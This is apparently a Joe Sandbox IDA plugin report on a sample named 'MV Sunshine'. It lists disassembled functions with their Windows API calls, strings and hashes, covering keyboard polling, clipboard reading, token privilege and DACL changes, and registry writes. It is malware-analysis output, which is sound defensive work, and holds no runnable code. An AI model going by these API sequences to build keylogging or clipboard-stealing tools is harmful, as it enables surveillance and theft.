Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$prn
API String ID: 3977979337-3802375623
Opcode ID: 8fe9678727aa5ea77bc968d874033c03297f481938289044d99764555a1214ab
Instruction ID: f3be10944a8387a784906cbb591112a5575e41428e905faf9d0ffc03d8b74f22
Opcode Fuzzy Hash: 8fe9678727aa5ea77bc968d874033c03297f481938289044d99764555a1214ab
Instruction Fuzzy Hash: 6E427C30204341EFD725EF68C884AAABBE6FF4A364F14151DF696872A1C731AC51CF92

Function 006A804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 006A873F

Strings

%d/%02d/%02d, xrefs: 006A8478

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: dda81a27405d8eb23bce3a5897f7eb244214220ffe78917e8ed7426266239f8c
Instruction ID: e15c69c8c4907ecd63480543ebdc5401e675520bd2265cb1f264693b1439d78d
Opcode Fuzzy Hash: dda81a27405d8eb23bce3a5897f7eb244214220ffe78917e8ed7426266239f8c
Instruction Fuzzy Hash: CA12BE71500214AFEB25AF64CC49FAE7BBAEF8A710F244129F915EB2A1DB709D41CF50

Function 0063710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006375C2
_memset.LIBCMT ref: 006376B1
_memmove.LIBCMT ref: 00637C4B
_memmove.LIBCMT ref: 00637E4F

Strings

\b(?<=\w), xrefs: 00673C41
Oac, xrefs: 0067287E
0wm, xrefs: 00671F5B
[:>:]], xrefs: 0063760A
\b(?=\w), xrefs: 00673C34
DEFINE, xrefs: 006725AF
[:<:]], xrefs: 006375F1
Q\E, xrefs: 006381C1

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove$_memset
String ID: 0wm$DEFINE$Oac$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-261310638
Opcode ID: b97c2cbe8ed1e6d2616e6bb923af12f94eef5d5ad65cb5c9d5fc21fe80f44306
Instruction ID: 58caa4d147c838421bce4a33c846d29864c8dd3a9b22f81ca364b57bf3655bcc
Opcode Fuzzy Hash: b97c2cbe8ed1e6d2616e6bb923af12f94eef5d5ad65cb5c9d5fc21fe80f44306
Instruction Fuzzy Hash: 41939471A00216DFDB24CF58C8917EDB7B2FF48710F25816AE959AB381E7709E81DB90

Function 00624A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00624A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0065DA8E
IsIconic.USER32(?), ref: 0065DA97
ShowWindow.USER32(?,00000009), ref: 0065DAA4
SetForegroundWindow.USER32(?), ref: 0065DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0065DAC4
GetCurrentThreadId.KERNEL32 ref: 0065DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0065DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0065DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0065DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0065DAF8
SetForegroundWindow.USER32(?), ref: 0065DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065DB10
keybd_event.USER32(00000012,00000000), ref: 0065DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065DB25
keybd_event.USER32(00000012,00000000), ref: 0065DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065DB33
keybd_event.USER32(00000012,00000000), ref: 0065DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0065DB42
keybd_event.USER32(00000012,00000000), ref: 0065DB47
SetForegroundWindow.USER32(?), ref: 0065DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0065DB71

Strings

Shell_TrayWnd, xrefs: 0065DA89

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 5d5c0677efe059cda06f6842e4658f1f582d3dbeb611319de250b036e3afdc7c
Instruction ID: 7ba12d964978c2250ecbc26e0c9e60bd4180cb34944bbcc7d131243da65850e1
Opcode Fuzzy Hash: 5d5c0677efe059cda06f6842e4658f1f582d3dbeb611319de250b036e3afdc7c
Instruction Fuzzy Hash: 75316071A40318BAEB306FA19C49FBF3E6EEB45B51F115025FA04AA1D0D6B06901AFA1

Function 00678858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00678CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00678D0D
Part of subcall function 00678CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00678D3A
Part of subcall function 00678CC3: GetLastError.KERNEL32 ref: 00678D47

_memset.LIBCMT ref: 0067889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006788ED
CloseHandle.KERNEL32(?), ref: 006788FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00678915
GetProcessWindowStation.USER32 ref: 0067892E
SetProcessWindowStation.USER32(00000000), ref: 00678938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00678952

Part of subcall function 00678713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00678851), ref: 00678728
Part of subcall function 00678713: CloseHandle.KERNEL32(?,?,00678851), ref: 0067873A

Strings

winsta0, xrefs: 00678910
, xrefs: 006788AA
default, xrefs: 0067894D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: cf3d1c625f23db8aaa9c864bd9abc629da87f6c8b31974850e1b8396caafde94
Instruction ID: 5f0a9faa552cbb2b1a0cbddf2b60d4d97f8160d67b0d60b941d3e48d41269cec
Opcode Fuzzy Hash: cf3d1c625f23db8aaa9c864bd9abc629da87f6c8b31974850e1b8396caafde94
Instruction Fuzzy Hash: 0F816D71940249AFDF11DFA4DC49AEE7BBAEF04304F18812AF918A7261DB319E14DB61

Function 0069425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(006AF910), ref: 00694284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00694292
GetClipboardData.USER32(0000000D), ref: 0069429A
CloseClipboard.USER32 ref: 006942A6
GlobalLock.KERNEL32(00000000), ref: 006942C2
CloseClipboard.USER32 ref: 006942CC
GlobalUnlock.KERNEL32(00000000), ref: 006942E1
IsClipboardFormatAvailable.USER32(00000001), ref: 006942EE
GetClipboardData.USER32(00000001), ref: 006942F6
GlobalLock.KERNEL32(00000000), ref: 00694303
GlobalUnlock.KERNEL32(00000000), ref: 00694337
CloseClipboard.USER32 ref: 00694447

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 4888cfd9302308d9a07c54109206376bb377c711dada9d0565bbb17d63f4f56c
Instruction ID: 15a6889e8802f93a4db3a5c77c66bbfdef52a8d4333aa59670bfcb74e112a979
Opcode Fuzzy Hash: 4888cfd9302308d9a07c54109206376bb377c711dada9d0565bbb17d63f4f56c
Instruction Fuzzy Hash: 84519131204701ABDB10BFA0EC86F6E77AEAF85B01F10552DF556D21A1DF70E9068F66

Function 0068C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0068C9F8
FindClose.KERNEL32(00000000), ref: 0068CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0068CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0068CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0068CAAF
__swprintf.LIBCMT ref: 0068CAFB
__swprintf.LIBCMT ref: 0068CB3E

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

__swprintf.LIBCMT ref: 0068CB92

Part of subcall function 006438D8: __woutput_l.LIBCMT ref: 00643931

__swprintf.LIBCMT ref: 0068CBE0

Part of subcall function 006438D8: __flsbuf.LIBCMT ref: 00643953
Part of subcall function 006438D8: __flsbuf.LIBCMT ref: 0064396B

__swprintf.LIBCMT ref: 0068CC2F
__swprintf.LIBCMT ref: 0068CC7E
__swprintf.LIBCMT ref: 0068CCCD

Strings

%02d, xrefs: 0068CB86, 0068CB90, 0068CBDE, 0068CC2D, 0068CC7C, 0068CCCB
%4d, xrefs: 0068CB38
%4d%02d%02d%02d%02d%02d, xrefs: 0068CAF5

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: ff60145f985fcc3e2eb15f0ca82594cf8d22f4a6270e2ad8c372097842af9d52
Instruction ID: 916e3079c826c004b1c97d6c21128b305c0d509971a937198ae232be0867d16c
Opcode Fuzzy Hash: ff60145f985fcc3e2eb15f0ca82594cf8d22f4a6270e2ad8c372097842af9d52
Instruction Fuzzy Hash: 6FA15FB1408714ABC750FBA4D986DAFB7EEEF94700F40491EF586D2191EA34DA08CB66

Function 0068F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0068F221
_wcscmp.LIBCMT ref: 0068F236
_wcscmp.LIBCMT ref: 0068F24D
GetFileAttributesW.KERNEL32(?), ref: 0068F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0068F279
FindNextFileW.KERNEL32(00000000,?), ref: 0068F291
FindClose.KERNEL32(00000000), ref: 0068F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0068F2B8
_wcscmp.LIBCMT ref: 0068F2DF
_wcscmp.LIBCMT ref: 0068F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0068F308
SetCurrentDirectoryW.KERNEL32(006DA5A0), ref: 0068F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0068F330
FindClose.KERNEL32(00000000), ref: 0068F33D
FindClose.KERNEL32(00000000), ref: 0068F34F

Strings

*.*, xrefs: 0068F2B3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 320b031a41f2767d21c2e6d22cfce408b8b6d8125d19d384083b18c09eb0d7ef
Instruction ID: 78ad512f895e6debf78e2450adc64d37b061e95166cc9d01476592b4edc32d57
Opcode Fuzzy Hash: 320b031a41f2767d21c2e6d22cfce408b8b6d8125d19d384083b18c09eb0d7ef
Instruction Fuzzy Hash: 0731B3765002196BDB10FBF4EC58ADE77AEAF09361F100276E840D3290EB71EE458FA5

Function 006A0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,006AF910,00000000,?,00000000,?,?), ref: 006A0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006A0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006A0D1D
RegCloseKey.ADVAPI32(?), ref: 006A103D
RegCloseKey.ADVAPI32(00000000), ref: 006A104A

Strings

REG_QWORD, xrefs: 006A0F8B
REG_BINARY, xrefs: 006A0FD8
REG_MULTI_SZ, xrefs: 006A0E05
REG_EXPAND_SZ, xrefs: 006A0CBA
REG_SZ, xrefs: 006A0D5B
REG_DWORD, xrefs: 006A0F0E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 1d99a78c2807f98767ecfa8f827b7a176e9866add6e1eb8cb17fd1ccc487da44
Instruction ID: 836b21a02dc3fffeb3ba3f40c070a3490b43ed9ad868d588701b01ed36faf047
Opcode Fuzzy Hash: 1d99a78c2807f98767ecfa8f827b7a176e9866add6e1eb8cb17fd1ccc487da44
Instruction Fuzzy Hash: AA0257356006119FDB54EF24D891E2AB7E6EF89724F04885DF88A9B362CB31EC41CF95

Function 0068F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0068F37E
_wcscmp.LIBCMT ref: 0068F393
_wcscmp.LIBCMT ref: 0068F3AA

Part of subcall function 006845C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006845DC

FindNextFileW.KERNEL32(00000000,?), ref: 0068F3D9
FindClose.KERNEL32(00000000), ref: 0068F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0068F400
_wcscmp.LIBCMT ref: 0068F427
_wcscmp.LIBCMT ref: 0068F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0068F450
SetCurrentDirectoryW.KERNEL32(006DA5A0), ref: 0068F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0068F478
FindClose.KERNEL32(00000000), ref: 0068F485
FindClose.KERNEL32(00000000), ref: 0068F497

Strings

*.*, xrefs: 0068F3FB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 890530b190aaffcef33628512f278b5c6b84f58d90a8d82d069d9bb3e78d0ba4
Instruction ID: fa0f6971e8cf4e9639fea5931bc38c90c38ea5901fd146faa16a9cb6b0e426c2
Opcode Fuzzy Hash: 890530b190aaffcef33628512f278b5c6b84f58d90a8d82d069d9bb3e78d0ba4
Instruction Fuzzy Hash: 0C31B7715011196BCF10BBA4EC84ADE77EE9F49360F100376E850A32A1DB70DE45CFA5

Function 006781F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0067874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00678766
Part of subcall function 0067874A: GetLastError.KERNEL32(?,0067822A,?,?,?), ref: 00678770
Part of subcall function 0067874A: GetProcessHeap.KERNEL32(00000008,?,?,0067822A,?,?,?), ref: 0067877F
Part of subcall function 0067874A: HeapAlloc.KERNEL32(00000000,?,0067822A,?,?,?), ref: 00678786
Part of subcall function 0067874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0067879D

Part of subcall function 006787E7: GetProcessHeap.KERNEL32(00000008,00678240,00000000,00000000,?,00678240,?), ref: 006787F3
Part of subcall function 006787E7: HeapAlloc.KERNEL32(00000000,?,00678240,?), ref: 006787FA
Part of subcall function 006787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00678240,?), ref: 0067880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0067825B
_memset.LIBCMT ref: 00678270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0067828F
GetLengthSid.ADVAPI32(?), ref: 006782A0
GetAce.ADVAPI32(?,00000000,?), ref: 006782DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006782F9
GetLengthSid.ADVAPI32(?), ref: 00678316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00678325
HeapAlloc.KERNEL32(00000000), ref: 0067832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0067834D
CopySid.ADVAPI32(00000000), ref: 00678354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00678385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006783AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006783BF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: acf473918f453581bf34993f6e78a24a753ff784c4f34f70ea8aa9fe9fbf3b0b
Instruction ID: 834e8adb88c9c2e72f321324c60731931e4e5e736525d034ca735e9b028e9b52
Opcode Fuzzy Hash: acf473918f453581bf34993f6e78a24a753ff784c4f34f70ea8aa9fe9fbf3b0b
Instruction Fuzzy Hash: DD612A71940219EFDF109F94DC48AEEBBBAFF05710B148269F819A7291DB359E05CF60

Function 00636843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

LIMIT_RECURSION=, xrefs: 00671635
PJl, xrefs: 006368B3
Oac, xrefs: 00671888, 0067192F, 006719DD
LIMIT_MATCH=, xrefs: 006715A9
NO_AUTO_POSSESS), xrefs: 00671567
UTF), xrefs: 00671533
CRLF), xrefs: 006716FA
NO_START_OPT), xrefs: 00671588
UTF16), xrefs: 00671508
UCP), xrefs: 00671546
BSR_UNICODE), xrefs: 00671771
CR), xrefs: 006716C0
ANYCRLF), xrefs: 00671734
BSR_ANYCRLF), xrefs: 00671757
LF), xrefs: 006716DD
ANY), xrefs: 00671717

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oac$PJl$UCP)$UTF)$UTF16)
API String ID: 0-3239182561
Opcode ID: a8294f2ab482824a260511882bdaec6f93567423d50acb7071e9519c2d3349ee
Instruction ID: 809d628c56a982d3a5bd69e974260a9a80890f8378f0a7de068c2d99a6a7de30
Opcode Fuzzy Hash: a8294f2ab482824a260511882bdaec6f93567423d50acb7071e9519c2d3349ee
Instruction Fuzzy Hash: 0F725E75E002199BDB24CF59C8907EEB7B6EF49710F14816AE949EB390EB709D81CB90

Function 006A0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006A0038,?,?), ref: 006A10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A0737

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006A07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006A086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006A0AAD
RegCloseKey.ADVAPI32(00000000), ref: 006A0ABA

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: dac244a14b523d258d337ffb72b86b183f4482d763e2ca7679583e7ad1f7a1e6
Instruction ID: 1d0acd46db280b03178d3a9ec45f9b28e62f3e9e7747073b258d8e8dd1baec8d
Opcode Fuzzy Hash: dac244a14b523d258d337ffb72b86b183f4482d763e2ca7679583e7ad1f7a1e6
Instruction Fuzzy Hash: BDE16F31604310AFDB54EF28C891D6ABBE6EF89714F04856DF54ADB262DA31ED01CF51

Function 00680219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00680241
GetAsyncKeyState.USER32(000000A0), ref: 006802C2
GetKeyState.USER32(000000A0), ref: 006802DD
GetAsyncKeyState.USER32(000000A1), ref: 006802F7
GetKeyState.USER32(000000A1), ref: 0068030C
GetAsyncKeyState.USER32(00000011), ref: 00680324
GetKeyState.USER32(00000011), ref: 00680336
GetAsyncKeyState.USER32(00000012), ref: 0068034E
GetKeyState.USER32(00000012), ref: 00680360
GetAsyncKeyState.USER32(0000005B), ref: 00680378
GetKeyState.USER32(0000005B), ref: 0068038A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
